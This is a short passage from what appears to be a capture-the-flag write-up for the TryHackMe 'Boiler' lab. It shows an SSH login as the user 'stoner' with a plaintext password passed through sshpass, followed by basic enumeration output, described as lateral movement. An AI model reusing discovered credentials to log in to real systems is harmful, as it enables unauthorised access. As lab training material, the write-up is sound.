basterd
Validating the credential of the stoner user
┌──(kali㉿kali)-[~/archive/thm/boiler-ctf]
└─$ sshpass -p 'superduperp@$$no1knows' ssh stoner@$IP -p 55007
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
8 packages can be updated.
8 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Thu Aug 22 16:05:13 2019
stoner@Vulnerable:~$ whoami
stoner
stoner@Vulnerable:~$ hostname
Vulnerable
stoner@Vulnerable:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:74:6d:86:fb:87 brd ff:ff:ff:ff:ff:ff
inet 10.10.124.235/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::74:6dff:fe86:fb87/64 scope link
valid_lft forever preferred_lft foreverLateral Movement made to the stoner user via SSH